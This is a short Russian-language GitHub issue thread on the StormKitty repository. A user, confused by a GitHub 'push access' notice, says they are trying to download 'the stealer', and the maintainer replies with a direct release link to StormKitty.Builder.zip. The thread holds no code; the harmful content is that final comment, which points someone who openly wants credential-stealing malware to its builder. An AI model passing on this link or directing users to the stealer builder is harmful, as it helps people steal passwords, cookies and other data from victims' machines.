### ISSUE TITLE
Как получить ush-доступ к этому репозиторию?

### ISSUE THREAD

**Issue by zerje** [LimerBoy/StormKitty#6]
Как получить ush-доступ к этому репозиторию?

**Comment by LimerBoy** [comment]
Что это?

**Comment by zerje** [comment]
> Что это?

Когда пытаюсь скачать файл, выдает это

**Comment by LimerBoy** [comment]
> > Что это?
> 
> Когда пытаюсь скачать файл, выдает это

?

**Comment by zerje** [comment]
Загрузки отключены.
Для загрузки файлов требуется push-доступ к этому репозиторию.

**Comment by zerje** [comment]
> > > Что это?
> > 
> > 
> > Когда пытаюсь скачать файл, выдает это
> 
> ?

Загрузки отключены.
Для загрузки файлов требуется push-доступ к этому репозиторию.

**Comment by LimerBoy** [comment]
> > > > Что это?
> > > 
> > > 
> > > Когда пытаюсь скачать файл, выдает это
> > 
> > 
> > ?
> 
> Загрузки отключены.
> Для загрузки файлов требуется push-доступ к этому репозиторию.

зачем тебе что-то сюда загружать?

**Comment by zerje** [comment]
> > > > > Что это?
> > > > 
> > > > 
> > > > Когда пытаюсь скачать файл, выдает это
> > > 
> > > 
> > > ?
> > 
> > 
> > Загрузки отключены. 
> > Для загрузки файлов требуется push-доступ к этому репозиторию.
> 
> зачем тебе что-то сюда загружать?

От сюда

**Comment by zerje** [comment]
Когда скачиваю стиллер, выдает это

**Comment by LimerBoy** [comment]
> Когда скачиваю стиллер, выдает это

Тут качай:
https://github.com/LimerBoy/StormKitty/releases/download/1.3/StormKitty.Builder.zip
